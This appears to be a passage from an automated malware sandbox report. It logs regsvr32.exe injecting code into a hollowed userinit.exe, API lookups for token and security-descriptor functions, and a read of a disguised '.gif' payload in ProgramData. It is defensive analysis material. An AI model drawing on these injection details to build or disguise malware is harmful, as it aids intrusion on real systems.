Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ó, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d6e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d6e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d6e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d6e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d6e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d6e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d6e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d6e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d6e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d6e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d6e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d6e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #67: userinit.exe

69

0

»

Information	Value
ID	#67
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:29, Reason: Child Process
Unmonitor	End Time: 00:04:31, Reason: Terminated by Timeout
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xbb4
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B74

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	rwx	-
private_0x0000000000070000	0x00070000	0x000affff	Private Memory	rw	-
pagefile_0x00000000000b0000	0x000b0000	0x000b6fff	Pagefile Backed Memory	r	-
private_0x00000000000c0000	0x000c0000	0x001bffff	Private Memory	rw	-
locale.nls	0x001c0000	0x00226fff	Memory Mapped File	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	rw	-
pagefile_0x0000000000270000	0x00270000	0x00337fff	Pagefile Backed Memory	r	-
private_0x0000000000340000	0x00340000	0x003bffff	Private Memory	rw	-
private_0x00000000003e0000	0x003e0000	0x003effff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
pagefile_0x0000000000680000	0x00680000	0x0075efff	Pagefile Backed Memory	r	-
private_0x0000000000760000	0x00760000	0x0082ffff	Private Memory	rw	-
private_0x0000000000760000	0x00760000	0x007dffff	Private Memory	rw	-
private_0x00000000007f0000	0x007f0000	0x0082ffff	Private Memory	rw	-
pagefile_0x0000000000830000	0x00830000	0x00c22fff	Pagefile Backed Memory	r	-
private_0x0000000000c30000	0x00c30000	0x00d2ffff	Private Memory	rw	-
userinit.exe	0x00d30000	0x00d38fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d40000	0x00d40000	0x0193ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01940000	0x0226ffff	Memory Mapped File	r	-
private_0x0000000002270000	0x02270000	0x0237cfff	Private Memory	rw	-
private_0x0000000002380000	0x02380000	0x0257ffff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02600fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02604fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02608fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0260cfff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02612fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02616fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0261afff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0261efff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02624fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02628fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0262cfff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02632fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02636fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0263afff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0263efff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02644fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02648fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0264cfff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02652fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x02656fff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0265afff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0265efff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02692fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02696fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0269afff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0269efff	Private Memory	rw	-
private_0x0000000002620000	0x02620000	0x026b4fff	Private Memory	rw	-
private_0x0000000002620000	0x02620000	0x026b8fff	Private Memory	rw	-
private_0x0000000002620000	0x02620000	0x026bcfff	Private Memory	rw	-
private_0x0000000002620000	0x02620000	0x026c0fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026d6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026dafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026defff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026f4fff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026f8fff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026fcfff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x02700fff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x02716fff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x0271afff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x0271efff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x02734fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x02738fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x0273cfff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x02740fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02730fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02772fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x02790fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027d2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f0fff	Private Memory	rw	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffde008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xb74, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (3)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	1	Fn

Module (52)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	1	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	1	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	3	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 397295	1	Fn

Keyboard (3)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	1	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Get Info	type = KB_LOCALE_ID	1	Fn

System (4)

»

Operation	Additional Information	Success	Count	Logfile
Get Info	type = Operating System		3	Fn
Get Info	type = Operating System		1	Fn

Notifications (1/1)

Monitored Processes

Behavior Information - Grouped by Category

Before

After